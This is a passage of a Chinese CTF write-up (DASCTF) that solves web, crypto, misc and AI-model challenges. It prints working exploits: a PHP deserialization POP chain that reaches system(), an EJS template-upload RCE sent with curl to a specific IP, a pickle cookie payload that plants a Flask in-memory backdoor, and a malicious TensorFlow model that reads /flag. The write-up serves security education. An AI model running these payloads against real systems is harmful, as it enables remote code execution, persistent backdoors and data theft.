Web#

ez_unserialize#

思路：

H::__destruct(): 脚本结束时自动触发。它调用 $this->who->start()。
- 构造: 创建一个 H 对象，并将其 $who 属性设置为一个 A 类的对象。
A::start(): 被上一步调用。它执行 echo $this->next;，这将触发 $next 对象的 __toString() 方法。
- 构造: 将 A 对象的 $next 属性设置为一个 V 类的对象。
V::__toString(): 被上一步调用。它执行 $this->go->$abc; (其中 $abc = $this->dowhat)。为了触发 E::__get()，我们需要让它尝试访问一个 E 对象的私有属性。
- 构造: 将 V 对象的 $go 属性设置为一个 E 类的对象，并将其 $dowhat 属性设置为字符串 "secret"。
E::__get(): 当 V 尝试访问 E 的私有属性 secret 时被触发。代码检查 $name 是否为 "secret"，如果是，则调用 $this->found->check()。
- 构造: 将 E 对象的 $found 属性设置为一个 F 类的对象。
F::check(): 被上一步调用。它会 new $this->finalstep() 并调用 __invoke()。我们的目标是实例化 U 类。
- 关键绕过: 这里有 preg_match("/U/", ...) 检查。由于 PHP 的类名不区分大小写，我们可以将 $finalstep 设置为小写的 "u" 来绕过这个检查。new "u"() 依然会成功创建 U 类的实例。
- 构造: 将 F 对象的 $finalstep 属性设置为字符串 "u"。
U::__invoke(): 当 F 类中的新对象被 () 调用时触发，最终执行 system($_POST['cmd'])，达成 RCE。

1
<?php
2

3
// 声明所有需要用到的类
4
class A {
5
    public $first;
6
    public $step;
7
    public $next;
8
}
9
class E {
10
    public $found;
11
    private $you;
12
    private $secret;
13
}
14
class F {
15
    public $fifth;
16
    public $step;
17
    public $finalstep;
18
}
19
class H {
20
    public $who;
21
    public $are;
22
    public $you;
23
}
24
class V {
25
    public $good;
26
    public $keep;
27
    public $dowhat;
28
    public $go;
29
}
30
// N 和 U 类在服务器端被调用，payload中不需要它们的实例
31
class N {}
32
class U {}
33

34

35
// 1. 创建链条中的所有对象实例
36
$h = new H();
37
$a = new A();
38
$v = new V();
39
$e = new E();
40
$f = new F();
41

42
// 2. 按照攻击链设置对象的属性
43
$h->who = $a;
44
$a->next = $v;
45
$v->go = $e;
46
$v->dowhat = "secret"; // 触发 E::__get("secret")
47
$e->found = $f;
48
$f->finalstep = "u";   // 大小写绕过 preg_match
49

50
// 3. 序列化顶层对象并进行 URL 编码
51
$payload = serialize($h);
52
echo "Your Payload:\n\n";
53
echo urlencode($payload);
54

55
?>

1
curl -X POST \
2
  -d 'payload=PAYLOAD_STRING' \
3
  -d 'cmd=ls -la /' \
4
  http://target.com/challenge.php

staticNodeService#

目录索引渲染函数允许通过 templ 参数指定模板名并调用 res.render(templ, ...)。
静态文件服务：express.static(STATIC_DIR)。
安全中间件仅检查 req.path：
- 阻止了 ..（目录穿越）
- 阻止了以 js 结尾的路径（/js$/），企图防止 .ejs（字符串最后两字节是 js）的写入
上传接口：PUT /* 可以将 req.body.content（base64）写入到 STATIC_DIR + req.path 指定的任意路径。
模板名 templ 完全由用户控制并传入 res.render，若能在 views 目录中放置恶意 EJS 模板，即可在渲染时执行任意 JS。
上传接口允许向任意路径写入；但安全中间件阻止了 req.path 以 js 结尾，导致直接写入 *.ejs 会被拒绝。
结合路径归一化与客户端路径传递策略，可以在服务端“落地一个真正的 .ejs 文件”，随后通过 templ 正常渲染，从而 RCE 并读取 /flag。

构造恶意 EJS 模板（读取 flag）：

1
<%- global.process.mainModule.require('child_process').execSync('/readflag').toString() %>

将其进行 base64 编码（示例用 Python）：

1
python3 - <<'PY'
2
import base64
3
payload = "<%- global.process.mainModule.require('child_process').execSync('/readflag').toString() %>"
4
print(base64.b64encode(payload.encode()).decode())
5
PY

示例输出（缩写）：

1
PCUtIGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUucmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKCcvcmVhZGZsYWcnKS50b1N0cmluZygpICU+

利用路径构造与 --path-as-is，将恶意模板写入为真 .ejs 文件：

1
curl --path-as-is -i -s -X PUT 'http://45.40.247.139:22915/views/read.ejs/.' \
2
  -H 'Content-Type: application/json' \
3
  --data '{"content":"PCUtIGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUucmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKCcvcmVhZGZsYWcnKS50b1N0cmluZygpICU+"}'

预期返回：201 Created（文件已写入）。随后访问 /views/ 可见 read.ejs（不带尾点）。

触发渲染并回显 flag：

1
curl -s 'http://45.40.247.139:22915/views/?templ=read.ejs'

EZ Blog#

初始访问与信息搜集

首先，我们访问博客首页。根据页面上的提示信息“访客只能用访客账号登录哦！”，我们可以尝试常见的弱口令组合。

用户名: guest
密码: guest

使用这组凭证成功登录系统。登录后，我们检查浏览器存储的 Cookies，发现一个名为 Token 的 Cookie，其值非常可疑：

1
Token=8004954b000000000000008c03617070948c04557365729493942981947d94288c026964944b028c08757365726e616d65948c056775657374948c0869735f61646d696e94898c096c6f676765645f696e948875622e

漏洞分析：Python 反序列化

这串看似随机的字符串实际上是十六进制编码的。我们对其进行 Hex 解码，得到的结果是以 \x80\x04 开头的字节流，这是 Python pickle 模块序列化数据的典型特征（协议版本4）。

我们可以通过简单的 Python 脚本来验证其内容：

1
import pickle
2
import binascii
3

4
hex_cookie = "8004954b000000000000008c03617070948c04557365729493942981947d94288c026964944b028c08757365726e616d65948c056775657374948c0869735f61646d696e94898c096c6f676765645f696e948875622e"
5
decoded_cookie = binascii.unhexlify(hex_cookie)
6

7
# 为了能成功反序列化，需要定义一个占位符类
8
class User:
9
    pass
10
# 还需要告诉 pickle User 类在哪个模块下
11
import sys
12
sys.modules['app'] = sys.modules['__main__']
13

14
deserialized_object = pickle.loads(decoded_cookie)
15
print(deserialized_object.__dict__)

输出结果为：

1
{'id': 2, 'username': 'guest', 'is_admin': False, 'logged_in': True}

这证实了我们的猜想：服务器通过反序列化 Cookie 来验证用户身份，并且存在明显的 Python 反序列化漏洞。

漏洞利用：注入内存马

由于题目环境不出网，我们无法使用反弹 Shell。因此，最佳策略是注入一个内存马，在服务器应用内部创建一个后门。

一个巧妙的思路是劫持 Flask 应用的 404 错误处理器。当用户访问任何不存在的页面时，我们的恶意代码就会被触发。

以下是用于生成恶意 Payload 的 Python 脚本：

1
import os
2
import pickle
3
import binascii
4
from flask import request # 模拟导入，实际在服务器上运行
5

6
# 定义恶意类，其 __reduce__ 方法将在反序列化时被调用
7
class Exploit:
8
    def __reduce__(self):
9
        # 这段代码会找到并替换 Flask 应用的 404 错误处理器
10
        # 新的处理器会执行 URL 参数 `cmd` 传入的命令
11
        command = (
12
            "global app, request; "
13
            "exc_class, code = app._get_exc_class_and_code(404); "
14
            "app.error_handler_spec[None][code][exc_class] = "
15
            "lambda e: __import__('os').popen(request.args.get('cmd')).read()"
16
        )
17
        return (exec, (command,))
18

19
# 实例化恶意类
20
payload_obj = Exploit()
21

22
# 序列化并进行 hex 编码
23
pickled_data = pickle.dumps(payload_obj)
24
hex_payload = binascii.hexlify(pickled_data).decode()
25

26
print("请将以下 Payload 替换到你的 Token Cookie 中:")
27
print(hex_payload)

触发 Payload 并获取 RCE
运行上述脚本，复制生成的十六进制 Payload。
在浏览器开发者工具中，将 Token Cookie 的值替换为这个新的 Payload。
访问 /add 页面。这是一个需要身份验证的页面，因此服务器会尝试反序列化我们的 Cookie，从而触发 __reduce__ 方法，成功注入内存马。此时页面可能会报错，这是正常现象。
内存马注入成功后，我们就可以通过访问任意不存在的页面来执行命令了。

http://<题目地址>/404?cmd=ls

Crypto#

Random#

设存在连续三位为 0 的比特（靠近序列尾部较易出现）：

令对应的三个密文为

c1 = y^2 (mod n)
c2 = (y + d1)^2 (mod n)
c3 = (y + d1 + d2)^2 (mod n)

其中 d1, d2 都是不超过 2^48 的小整数。

记差值：

a = (c2 - c1) mod n = 2*y*d1 + d1^2 (mod n)
b = (c3 - c1) mod n = 2*y*(d1 + d2) + (d1 + d2)^2 (mod n)

消去未知 y 可以得到关于 d1, d2 的方程： (a - d_1^2) (d_1 + d_2) - d_1 \big(b - (d_1 + d_2)^2\big) \equiv 0 \pmod{n}

由于 d1, d2 很小（上界约 2^48），可将其视为“多变量小根”，使用 Coppersmith 方法在模 n 的多项式环中寻找小根 (d1, d2)。

一旦得到 d1，即可恢复 y： 2yd_1 + d_1^2 \equiv a \pmod{n} \quad\Rightarrow\quad y \equiv (a - d_1^2) \cdot (2d_1)^{-1} \pmod{n}

之后，继续向前逐位判断下一位是 0 还是 1：

假设下一位是 0：尝试解一元小根 (y - d)^2 \equiv c_{next} (mod\ n)，若存在小根 d（界 2^48），则确认为 0，并更新 y ← y - d。
若无解，则该位为 1。此时 (y - d)^2 \equiv c_{next} * x^{-1} (mod\ n)，再求小根并更新 y。

这样即可依次恢复整段比特串，进而转为字节得到明文。

1
from sage.all import *
2
import itertools
3
import ast
4
from Crypto.Util.number import long_to_bytes
5

6

7
def small_roots_multivariate(f, bounds, m=2, d=None):
8
    """
9
    Multivariate Coppersmith small roots, adapted from the approach in the writeup.
10
    f: polynomial over Zmod(N) in multiple variables
11
    bounds: tuple of bounds (B1, B2, ...)
12
    m: lattice parameter (default 2)
13
    d: degree parameter (default: total degree of f)
14
    Returns list of tuples (r1, r2, ...) in Zmod(N) representing small roots.
15
    """
16
    if d is None:
17
        d = f.degree()
18
    R = f.base_ring()
19
    N = R.cardinality()
20
    # Normalize leading coefficient
21
    f /= f.coefficients().pop(0)
22
    f = f.change_ring(ZZ)
23
    G = Sequence([], f.parent())
24
    for i in range(m + 1):
25
        base = (N ** (m - i)) * (f ** i)
26
        for shifts in itertools.product(range(d), repeat=f.nvariables()):
27
            g = base * prod([v**s for v, s in zip(f.variables(), shifts)])
28
            G.append(g)
29
    B, monomials = G.coefficient_matrix()
30
    monomials = vector(monomials)
31
    # Scale columns by bounds
32
    factors = [monomial(*bounds) for monomial in monomials]
33
    for i, factor in enumerate(factors):
34
        B.rescale_col(i, factor)
35
    B = B.dense_matrix().LLL()
36
    B = B.change_ring(QQ)
37
    for i, factor in enumerate(factors):
38
        B.rescale_col(i, 1 / factor)
39
    H = Sequence([], f.parent().change_ring(QQ))
40
    for h in filter(None, B * monomials):
41
        H.append(h)
42
        I = H.ideal()
43
        if I.dimension() == -1:
44
            H.pop()
45
        elif I.dimension() == 0:
46
            roots = []
47
            for root in I.variety(ring=ZZ):
48
                tup = tuple(R(root[var]) for var in f.variables())
49
                roots.append(tup)
50
            if roots:
51
                return roots
52
    return []
53

54

55
def find_initial_y(n, x, enc, max_scan=32):
56
    """
57
    Try to locate a valid (d1, d2, y) near the end of enc by scanning windows
58
    of three consecutive ciphertexts assuming three consecutive 0-bits.
59
    Returns (y, d1_int, offset) where offset >= 0 indicates the shift from the last window.
60
    """
61
    for offset in range(0, min(max_scan, len(enc) - 3)):
62
        # We use enc[-(offset+4)], enc[-(offset+3)], enc[-(offset+2)] as c1, c2, c3
63
        c1 = enc[-(offset + 4)]
64
        c2 = enc[-(offset + 3)]
65
        c3 = enc[-(offset + 2)]
66
        a = (c2 - c1) % n
67
        b = (c3 - c1) % n
68
        R = PolynomialRing(Zmod(n), names=("d1", "d2"), implementation='generic')
69
        d1_sym, d2_sym = R.gens()
70
        f = (a - d1_sym**2) * (d1_sym + d2_sym) - d1_sym * (b - (d1_sym + d2_sym)**2)
71
        res = small_roots_multivariate(f, (2**48, 2**48), m=2, d=3)
72
        if not res:
73
            continue
74
        # Filter candidates: d1 != 0 and invertible modulo n, and y verifies c1
75
        for (d1_val, d2_val) in res:
76
            d1_int = int(d1_val)
77
            if d1_int == 0:
78
                continue
79
            if gcd(2 * d1_int, n) != 1:
80
                continue
81
            try:
82
                y = ((a - pow(d1_int, 2, n)) * inverse_mod(2 * d1_int, n)) % n
83
            except ZeroDivisionError:
84
                continue
85
            if pow(y, 2, n) == c1:
86
                return y, d1_int, offset
87
        # If none candidate passes, continue scanning
88
    raise ValueError("Failed to locate a valid initial (d1, d2, y). Try increasing max_scan or check assumptions.")
89

90

91
def recover(n, x, enc):
92
    # Locate initial y based on three consecutive 0-bits near the end
93
    y, d1_int, offset = find_initial_y(n, x, enc)
94

95
    # Determine the bit right before the triple zeros (optional); we'll follow the original writeup flow
96
    # Build bitstring starting from the assumed pattern; we keep '1000' as in writeup for compatibility
97
    m_bits = '1000'
98
    for i in range(4 + offset, len(enc)):
99
        R1 = PolynomialRing(Zmod(n), names=("d",))
100
        d = R1.gens()[0]
101
        # Try next bit as 0 first
102
        f0 = (y - d)**2 - enc[-(i+1)]
103
        roots0 = f0.monic().small_roots(X=2**48)
104
        if roots0:
105
            m_bits += '0'
106
            y = (y - int(roots0[0])) % n
107
        else:
108
            # Otherwise, treat as bit 1
109
            m_bits += '1'
110
            f1 = (y - d)**2 - (enc[-(i+1)] * inverse_mod(x, n))
111
            roots1 = f1.monic().small_roots(X=2**48)
112
            if not roots1:
113
                raise ValueError("Failed to find small root for next step; check assumptions or data.")
114
            y = (y - int(roots1[0])) % n
115

116
    m_int = int(m_bits, 2)
117
    m_bytes = long_to_bytes(m_int)
118
    return m_bytes, m_bits
119

120

121
def parse_output(path):
122
    with open(path, 'r') as f:
123
        lines = f.read().strip().splitlines()
124
    # Expecting format:
125
    # n = <int>
126
    # x = <int>
127
    # enc = [list]
128
    n = int(lines[0].split('=', 1)[1].strip())
129
    x = int(lines[1].split('=', 1)[1].strip())
130
    enc_str = lines[2].split('=', 1)[1].strip()
131
    enc = ast.literal_eval(enc_str)
132
    return n, x, enc
133

134

135
def main():
136
    n, x, enc = parse_output('output.txt')
137
    m_bytes, m_bits = recover(n, x, enc)
138
    print("Recovered bits:", m_bits)
139
    print("Recovered message:", m_bytes)
140

141

142
if __name__ == '__main__':
143
    main()

主要函数逻辑：

多变量小根 small_roots_multivariate(f, bounds, m, d)：构造格并 LLL 简化，提取多项式组合，求解 0 维理想的整数解，返回模 n 中的根。

初始化定位 find_initial_y(n, x, enc, max_scan)：

在密文末尾附近扫描窗口，假设存在三连 0bit；
对每个窗口用上面的二元方程求 (d1, d2) 小根；
过滤无效候选：d1 = 0、gcd(2*d1, n) ≠ 1（意味 (2*d1) 模 n 不可逆）；
计算 y 并验证 y^2 ≡ c1 (mod n)，找到可信初始 (y, d1) 与窗口偏移 offset。

恢复过程 recover(n, x, enc)：

先调用 find_initial_y 获取稳健的初始状态；
从对应位置开始逐位尝试一元小根，拼接比特串；
将比特串转为字节输出。

该实现解决了常见的失败场景：直接用最后三位假设为 0 时，可能出现 inverse_mod(2*d1, n) 不存在（模 n 下非单位），通过窗口扫描与 gcd 过滤确保 (2*d1) 可逆后再恢复 y。

Ridiculous LFSR#

m 的汉明重量固定为 w（旋转不改变重量）。
每轮得到 temp_i，其重量已知为 l[i]。
输出 c_i = temp_i XOR rotate^i(m)，其重量（可由位计数得到）记为 weight(c_i)。

对任意两个比特向量 x, y 有重量恒等式：

1
weight(x XOR y) = weight(x) + weight(y) - 2 * overlap1(x, y)

其中 overlap1(x, y) 为同时为 1 的位置数（也可视为按位与后 1 的数量）。套用到本题：

1
weight(c_i) = l[i] + w - 2 * dot_i

因此：

1
w = weight(c_i) - l[i] + 2 * dot_i

关键是如何用 c_i 和未知的 m 来表达 dot_i = overlap1(temp_i, rotate^i(m))。注意：

当 c_i[k] = 0 时，说明 temp_i[k] == rotate^i(m)[k]。
若此时 rotate^i(m)[k] = 1，则必有 temp_i[k] = 1，也就计入了 dot_i。于是可得：

1
dot_i = # { k | c_i[k] = 0 且 rotate^i(m)[k] = 1 }

这使得 dot_i 可以直接由 c_i 的零位与 m 的比特（经相应旋转的索引映射）线性表示。

在中，使用 OR-Tools 的 CP-SAT 建模：

变量：m_vars[0..n-1] ∈ {0,1} 表示 flag 的比特（与题目一致为 MSB-first），w_var ∈ [0,n] 表示重量。
对每一轮 i，构造 dot_i = sum_k a_{i,k} * m_k，其中 a_{i,k} = 1 当且仅当 c_i[(k - i) % n] == 0（这对应 c_i 的零位与旋转索引的匹配）。
加入约束：w_var == weight(c_i) - l[i] + 2 * dot_i。
rotate 的索引映射在约束中体现为 (k - i) % n。
求解后从比特构造出 m，并转为字节与字符串（必要时回退到 hex）。

1
import os
2
import ast
3
from ortools.sat.python import cp_model
4

5

6
def parse_output(file_path):
7
    with open(file_path, "r") as f:
8
        lines = f.read().strip().splitlines()
9
    # Parse LENGTH
10
    assert lines[0].startswith("LENGTH = ")
11
    LENGTH = int(lines[0].split("=")[1].strip())
12
    # Parse c and l using ast.literal_eval for safety
13
    assert lines[1].startswith("c = ")
14
    c_str = lines[1].split("=", 1)[1].strip()
15
    c_list = ast.literal_eval(c_str)
16
    assert lines[2].startswith("l = ")
17
    l_str = lines[2].split("=", 1)[1].strip()
18
    l_list = ast.literal_eval(l_str)
19
    return LENGTH, c_list, l_list
20

21

22
def int_to_bits(x, n):
23
    s = bin(x)[2:].zfill(n)
24
    return [int(ch) for ch in s]
25

26

27
def solve_flag(output_path):
28
    LENGTH, c_list, l_list = parse_output(output_path)
29
    n = LENGTH
30
    m_count = len(c_list)
31

32
    # Precompute c bits and weights
33
    c_bits = [int_to_bits(ci, n) for ci in c_list]
34
    c_weights = [sum(bits) for bits in c_bits]
35

36
    model = cp_model.CpModel()
37

38
    # Variables for m (original flag bits, MSB-first order as in task.py)
39
    m_vars = [model.NewIntVar(0, 1, f"m_{k}") for k in range(n)]
40
    # Constant Hamming weight of m across rotations
41
    w_var = model.NewIntVar(0, n, "w")
42

43
    dot_vars = []
44
    for i in range(m_count):
45
        d = model.NewIntVar(0, n, f"dot_{i}")
46
        dot_vars.append(d)
47
        # dot_i = sum_k a_i_k * m_k, where a_i_k = c_i[(k - i) % n]
48
        terms = []
49
        for k in range(n):
50
            if c_bits[i][(k - i) % n] == 0:
51
                terms.append(m_vars[k])
52
        if terms:
53
            model.Add(d == sum(terms))
54
        else:
55
            model.Add(d == 0)
56
        # Constraint: w = l[i] + 2*dot_i - weight(c_i)
57
        model.Add(w_var == c_weights[i] - l_list[i] + 2 * d)
58

59
    # Solve
60
    solver = cp_model.CpSolver()
61
    solver.parameters.max_time_in_seconds = 60.0
62
    solver.parameters.num_search_workers = 8
63
    status = solver.Solve(model)
64

65
    if status not in (cp_model.OPTIMAL, cp_model.FEASIBLE):
66
        raise RuntimeError("No feasible solution found by CP-SAT.")
67

68
    m_bits = [solver.Value(v) for v in m_vars]
69
    w_val = solver.Value(w_var)
70
    # Build integer from bits (MSB-first)
71
    bit_str = "".join(str(b) for b in m_bits)
72
    m_int = int(bit_str, 2)
73

74
    # Convert to bytes (minimal length sufficient for bit-length)
75
    byte_len = (n + 7) // 8
76
    inner_bytes = m_int.to_bytes(byte_len, byteorder="big")
77
    # Strip leading zero bytes that may arise from bit-length vs byte boundary
78
    inner_bytes = inner_bytes.lstrip(b"\x00")
79

80
    try:
81
        inner_text = inner_bytes.decode("utf-8")
82
    except Exception:
83
        # Fallback to latin-1 if utf-8 fails
84
        try:
85
            inner_text = inner_bytes.decode("latin-1")
86
        except Exception:
87
            inner_text = inner_bytes.hex()
88

89
    full_flag = f"DASCTF{{{inner_text}}}"
90

91
    print(f"Recovered LENGTH: {n}")
92
    print(f"Recovered weight(m): {w_val}")
93
    print(f"Recovered inner bytes (hex): {inner_bytes.hex()}")
94
    print(f"Recovered inner text: {inner_text}")
95
    print(f"Flag: {full_flag}")
96

97

98
if __name__ == "__main__":
99
    # Assume running from the challenge directory; read local output.txt
100
    script_dir = os.path.dirname(os.path.abspath(__file__))
101
    output_path = os.path.join(script_dir, "output.txt")
102
    solve_flag(output_path)

Reverse#

PLUS#

Msic#

成功男人背后的女人#

ps打开发现一个隐藏图层发现很多男女标男1女0

1
010001000100000101010011010000110101010001000110011110110111011100110000011011010100010101001110010111110110001001100101011010000011000101101110010001000101111101001101010001010110111001111101

DS&Ai#

SM4-OFB#

表头为：序号、姓名、手机号、身份证号、IV。观察可知：

姓名密文为 32 个 hex 字符（16 字节）
手机号密文为 32 个 hex 字符（16 字节）
身份证号密文为 64 个 hex 字符（32 字节）
IV 字段为 6162636465666768696a6b6c6d6e6f70，对应 ASCII 为 abcdefghijklmnop，所有行相同。

本题中，IV 对每一行每个字段都相同且固定，意味着每次加密都从同一个初始状态生成相同的密钥流序列（如果对每个字段都是同起点），因此可以通过第一条记录的已知明文分别恢复：

姓名字段的 16 字节密钥流片段（KS_name）
手机号字段的 16 字节密钥流片段（KS_phone）
身份证号字段的 32 字节密钥流片段（KS_id）

注意：第一条记录的真实明文字节长度可能短于密文字节长度（例如姓名的 UTF-8 仅 9 字节），在流加密中，超出明文长度的密文字节等于密钥流字节（因为相当于明文的该部分是 0），因此将明文尾部按 0x00 填充到与密文等长即可完整恢复密钥流片段。

使用 openpyxl 读取 Excel，解析每一列的 hex 字符串为字节数据。
取第 2 行（第一条数据行）的“姓名/手机号/身份证号”密文，与题目给出的已知明文分别异或，得到 KS_name、KS_phone、KS_id。
遍历所有行，对对应字段的密文分别与已知密钥流片段异或，还原出明文；将末尾的 \x00 去除并用 UTF-8 解码。
在还原出的数据中查找姓名为“何浩璐”，对其身份证号做 MD5，作为题目要求的 flag。

1
from openpyxl import load_workbook
2
import hashlib
3

4
wb = load_workbook('个人信息表.xlsx', read_only=True, data_only=True)
5
ws = wb.active
6
rows = list(ws.iter_rows(values_only=True))
7

8
# 已知第一条数据行的明文
9
name0 = '蒋宏玲'.encode('utf-8')
10
phone0 = '17145949399'.encode('utf-8')
11
id0 = '220000197309078766'.encode('utf-8')
12

13
# 对应密文（第2行）
14
c_name = bytes.fromhex(rows[1][1])
15
c_phone = bytes.fromhex(rows[1][2])
16
c_id = bytes.fromhex(rows[1][3])
17

18
# 反推出三个字段各自的密钥流片段（不足部分按 0x00 填充）
19
ks_name = bytes(x ^ y for x, y in zip(c_name, name0 + b'\x00' * (len(c_name) - len(name0))))
20
ks_phone = bytes(x ^ y for x, y in zip(c_phone, phone0 + b'\x00' * (len(c_phone) - len(phone0))))
21
ks_id = bytes(x ^ y for x, y in zip(c_id, id0 + b'\x00' * (len(c_id) - len(id0))))
22

23
flag_md5 = None
24
for r in rows[1:]:
25
    name = bytes(x ^ y for x, y in zip(bytes.fromhex(str(r[1])), ks_name)).rstrip(b'\x00').decode('utf-8')
26
    phone = bytes(x ^ y for x, y in zip(bytes.fromhex(str(r[2])), ks_phone)).rstrip(b'\x00').decode('utf-8')
27
    idnum = bytes(x ^ y for x, y in zip(bytes.fromhex(str(r[3])), ks_id)).rstrip(b'\x00').decode('utf-8')
28
    if name == '何浩璐':
29
        flag_md5 = hashlib.md5(idnum.encode('utf-8')).hexdigest()
30
        break
31

32
print('FLAG:', flag_md5)

Mini-modelscope#

为了满足服务器代码对 .tolist() 的要求，我们必须返回一个数字数组。我们可以将读取到的 flag 文件内容（原始字节流）直接解码为一个 uint8 类型的整数向量。向量中的每个数字就是 flag 中对应字符的 ASCII/UTF-8 码。

最终 Payload:

1
import tensorflow as tf
2
import os
3
import shutil
4

5
class MaliciousModel(tf.Module):
6
    def __init__(self):
7
        super(MaliciousModel, self).__init__()
8
        self.flag_path = tf.constant('/flag', dtype=tf.string)
9

10
    @tf.function(input_signature=[tf.TensorSpec(shape=[1, 1], dtype=tf.float32)])
11
    def serve(self, input_tensor):
12
        # 步骤1: 读取文件的原始字节
13
        raw_bytes = tf.io.read_file(self.flag_path)
14

15
        # 步骤2: 将字节流解码为 uint8 整数向量
16
        byte_vector = tf.io.decode_raw(raw_bytes, tf.uint8)
17

18
        # 步骤3: 返回这个向量，它满足 .tolist() 的要求
19
        return {'prediction': byte_vector}
20

21
# --- 保存并打包模型的代码 ---
22
model_dir = './malicious_model_final_vector'
23
zip_name = 'model'
24
if os.path.exists(model_dir): shutil.rmtree(model_dir)
25
if os.path.exists(f'{zip_name}.zip'): os.remove(f'{zip_name}.zip')
26

27
model = MaliciousModel()
28
tf.saved_model.save(model, model_dir, signatures={'serve': model.serve})
29
shutil.make_archive(zip_name, 'zip', model_dir)
30
shutil.rmtree(model_dir)
31
print(f"成功创建 '{zip_name}.zip'")

结果: 服务器成功执行并返回了预测结果！

1
预测结果: [68, 65, 83, 67, 84, 70, 123, 57, 55, 52, 49, 52, 55, 56, 48, 56, 48, 55, 52, 56, 49, 54, 56, 57, 54, 56, 52, 56, 53, 55, 50, 49, 57, 50, 49, 51, 51, 56, 57, 125, 10]

我们得到了 flag 的 ASCII 码数组。最后一步是将其转换回可读的字符串。

解码脚本:

1
flag_as_numbers = [
2
    68, 65, 83, 67, 84, 70, 123, 57, 55, 52, 49, 52, 55, 56, 48, 56, 48,
3
    55, 52, 56, 49, 54, 56, 57, 54, 56, 52, 56, 53, 55, 50, 49, 57, 50,
4
    49, 51, 51, 56, 57, 125, 10
5
]
6

7
# 最后一个数字 10 是换行符，我们将其忽略
8
flag_string = "".join(map(chr, flag_as_numbers[:-1]))
9

10
print(flag_string)